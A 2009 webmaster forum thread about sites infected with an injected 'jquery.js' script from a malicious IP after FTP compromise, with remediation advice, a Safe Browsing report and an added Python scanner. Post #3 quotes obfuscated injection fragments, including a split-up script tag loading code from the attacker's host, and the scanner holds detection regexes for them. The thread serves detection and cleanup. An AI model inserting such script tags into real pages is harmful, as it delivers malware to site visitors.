#1 |
bang bang
|
seeing this fake jquery.js file...anyone else?
94.247.2.195/jquery.js
In the html source of the sites I'm seeing it as unescaped. In my activity window I see it resolving to actually 94.247.2.195/jquery.js. I just saw it on two submitters today. So I'm thinking possibly all their sites are infested with it. I don't believe it to be them. Most likely a weak link at some place in their setup. I'm going to send a message out to the submitters, but wondering if anyone else has seen this and how did they proceed. I only noticed too because their sites were taking a while to load. So I popped open the activity window. Ugh. I just can't imagine these submitters are actually going to fix all their freesites. So most likely I'll be trashing a bunch. Too bad too because they were pretty decent sites. So yeah. Anyone else see this yet? Now I feel I need to write some code to scan all my sites for document.write code in the html source. Fun for tomorrow at some point.
#2 |
If something's hard to do, then it's not worth doing
Join Date: Sep 2008
Location: Berlin, Germany
Posts: 247
|
I can't reach that site anymore or I'd take a look and see what's in there. It might also not be fake, jquery's a JS library for user interface stuff so someone might actually be using it. It's quite useful in that sense.
__________________
What's blue and not heavy?
#3 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
That is an exploit added to html and javascript by FTP. If you are seeing that, then the submitter's FTP account has been accessed.
There are about 4 different incarnations of it -- all resulting in the same end result. You'll also want to check any php file for code like this embedded right before the <body tag
Code:
<?php if(!function_exists('tmp_lkojfghx')){
Code:
<script language=javascript><!-- document.write(unescape('uyN%3CsDLc0
Code:
<s'+'cri'+'pt src="htt'+'p://94.2'+'47.2.1'+'95/ne'+'ws/?id=10KK"><'+'/scri'+'pt>
news checks to see if there is a cookie, if not, it runs a toolbar installer.
Tell the submitter to change their FTP password, run a scan on their machine for spyware/trojans/viruses, then change their FTP password again if they have found anything.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
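An added example, not code from anyone in this thread: a small Python scanner of the kind the first post says it needs, covering the three injected patterns quoted in post #3. The rule regexes, the generalization of `tmp_lkojfghx` to any `tmp_` plus letters name, and the sample pages are assumptions made for illustration.

```python
import re

# Heuristic patterns modeled on the snippets quoted in this thread. They are
# assumptions for illustration, not a complete signature set.
RULES = {
    "document.write(unescape(": re.compile(
        r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "php function_exists('tmp_...')": re.compile(
        r"function_exists\s*\(\s*['\"]tmp_[a-z]{4,}['\"]", re.I),
    "script src on raw IP": re.compile(
        r"<script\b[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//"
        r"\d{1,3}(?:\.\d{1,3}){3}[/:'\"\s>]", re.I),
}
# The '+' joins used to split "<script" and the URL into harmless-looking bits.
CONCAT = re.compile(r"['\"]\s*\+\s*['\"]")

def scan_source(text):
    """Return sorted rule names matching text, or text with '+' joins removed."""
    joined = CONCAT.sub("", text)
    hits = set()
    for name, rx in RULES.items():
        if rx.search(text):
            hits.add(name)
        elif rx.search(joined):
            hits.add(name + " [split with '+']")
    return sorted(hits)

# Constructed samples (192.0.2.10 is a documentation address, not from the thread).
SAMPLES = {
    "clean.html": '<script src="http://code.example.com/jquery.js"></script>',
    "direct.html": '<script src="http://192.0.2.10/jquery.js"></script>',
    "split.html": "<script>document.write('<s'+'cri'+'pt src=\"htt'+'p://192.0'"
                  "+'.2.10/ne'+'ws/?id=1\"><'+'/scri'+'pt>');</script>",
    "escaped.html": "<script language=javascript><!-- "
                    "document.write(unescape('%3Cscript%3E')); //--></script>",
    "page.php": "<?php if(!function_exists('tmp_abcdefgh')){ } ?><body>",
}

def scan_all(pages):
    """Map each flagged page name to its findings; clean pages are omitted."""
    return {name: hits for name, src in pages.items() if (hits := scan_source(src))}

if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        print(name, "->", ", ".join(hits))
```

Feeding `scan_all` the fetched source of each listed site, keyed by URL, gives a list of pages to report back to the submitter; a match is a reason to look at the page, not proof of compromise.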
#5 |
I can now put whatever you want in this space :)
Join Date: Mar 2009
Location: Merica!
Posts: 543
|
http://safebrowsing.clients.google.c....195/jquery.js
Safe Browsing Diagnostic page for 94.247.2.0

What is the current listing status for 94.247.2.0?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 276 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-27, and the last time suspicious content was found on this site was on 2009-04-27.
Malicious software includes 32870 scripting exploit(s), 20 trojan(s), 8 exploit(s).
This site was hosted on 1 network(s) including AS12553.

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, 94.247.2.0 appeared to function as an intermediary for the infection of 7 site(s) including ultimathulelodge.com/, zavallis.com/, databpo.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 13612 domain(s), including serona.pe.kr/, hitzwallpaper.com/, firat.edu.tr/.

Next steps:
* Return to the previous page.
* If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

Updated 3 hours ago
©2008 Google - Google Home